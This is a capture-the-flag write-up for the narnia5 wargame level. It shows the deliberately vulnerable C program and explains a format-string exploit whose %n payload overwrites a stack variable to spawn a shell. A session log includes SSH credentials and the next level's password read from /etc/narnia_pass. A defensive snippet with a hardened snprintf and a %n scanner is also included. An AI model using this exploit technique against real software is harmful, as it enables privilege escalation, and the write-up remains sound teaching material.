narnia5
2016-02-16 14:01
176 views
```c
/** narnia5.c */
/*
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv){
    int i = 1;
    char buffer[64];

    /* argv[1] is used directly as the format string: this is the bug */
    snprintf(buffer, sizeof buffer, argv[1]);
    buffer[sizeof (buffer) - 1] = 0;

    printf("Change i's value from 1 -> 500. ");

    if(i==500){
        printf("GOOD\n");
        system("/bin/sh");
    }

    printf("No way...let me give you a hint!\n");
    printf("buffer : [%s] (%d)\n", buffer, strlen(buffer));
    printf ("i = %d (%p)\n", i, &i);
    return 0;
}
```
[Figure: stack layout]
Format string vulnerability. Just before snprintf is called, the stack looks as in the figure above:
the first argument is the address of buffer, here 0xffffd01c;
the second argument is the length of buffer, here 0x40, i.e. 64 bytes;
the third argument is the address of the format string, here 0xffffd2f5.
The format string we supply is python -c 'print "\xcc\xd5\xff\xff" + "%496x" + "%5$n"'
By snprintf's calling convention, the format string should normally be followed by two arguments: an integer, corresponding to %496x, and a pointer to an integer, corresponding to %5$n.
This can therefore be read as: write i's address 0xffffd5cc into buffer, then print the value of argument 1 in the figure in hexadecimal, padded to 496 bytes, so that snprintf has output 500 bytes in total
(even though only 64 of them land in buffer); then write the total number of bytes snprintf has output, i.e. 500, to the location pointed to by the fifth argument. The fifth argument is the start address of buffer,
whose content is i's address, so the end result is that i's value is changed to 500.
root@today:~# ssh narnia5@178.79.134.250
narnia5@178.79.134.250's password: faimahchiy
narnia5@melinda:~$ cd /tmp/shadowcoder5
narnia5@melinda:/tmp/shadowcoder5$ ls
narnia5 narnia5.c sleep.sh
narnia5@melinda:/tmp/shadowcoder5$ /narnia/narnia5 `python -c 'print "\xff\xff\xff\xff" + "%496x" + "%5$n"'`
Change i's value from 1 -> 500. No way...let me give you a hint!
buffer : [���� �] (34)
i = 1 (0xffffd5cc)
narnia5@melinda:/tmp/shadowcoder5$ /narnia/narnia5 `python -c 'print "\xcc\xd5\xff\xff" + "%496x" + "%5$n"'`
Change i's value from 1 -> 500. GOOD
$ whoami
narnia6
$ cat /etc/narnia_pass/narnia6
neezocaeng
$
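As an added example that is not part of the original writeup: the fix for the bug in narnia5 is to pass the untrusted string as a data argument to a fixed "%s" format. The block below shows that hardened call next to a small scanner that flags a %n conversion in a string about to be used as a format; both functions are my own constructions, and the 64-byte buffer size is taken from narnia5.

```c
#include <stdio.h>
#include <string.h>

/*
 * Scan a string that is about to be used as a printf-family format and
 * return 1 if it contains a %n conversion, the directive that makes
 * snprintf write its byte count to memory. Flags, width, precision,
 * positional "N$" selectors and length modifiers between '%' and the
 * conversion character are skipped.
 */
int has_write_directive(const char *fmt)
{
    for (const char *p = fmt; *p; p++) {
        if (*p != '%')
            continue;
        p++;                          /* look at what follows the '%' */
        if (*p == '%')
            continue;                 /* "%%" is a literal percent sign */
        while (*p && strchr("-+ #0123456789.*$hlLqjzt", *p))
            p++;                      /* skip flags, width, "5$", "ll", ... */
        if (*p == 'n')
            return 1;
        if (*p == '\0')
            break;                    /* directive cut off at end of string */
    }
    return 0;
}

/* Hardened form of narnia5's snprintf call: the untrusted string is the
 * data argument of a fixed format, so "%496x%5$n" is copied literally
 * and never interpreted. */
void hardened_copy(char *dst, size_t dstsz, const char *untrusted)
{
    snprintf(dst, dstsz, "%s", untrusted);
    dst[dstsz - 1] = '\0';
}

/* Copy s through hardened_copy into a 64-byte buffer (narnia5's size)
 * and return 1 if the buffer then holds s unchanged. */
int copies_literally(const char *s)
{
    char buf[64];
    hardened_copy(buf, sizeof buf, s);
    return strcmp(buf, s) == 0;
}

int main(void)
{
    const char *input = "\xcc\xd5\xff\xff%496x%5$n";   /* string from the writeup */
    printf("contains %%n: %d\n", has_write_directive(input));
    printf("hardened copy is literal: %d\n", copies_literally(input));
    return 0;
}
```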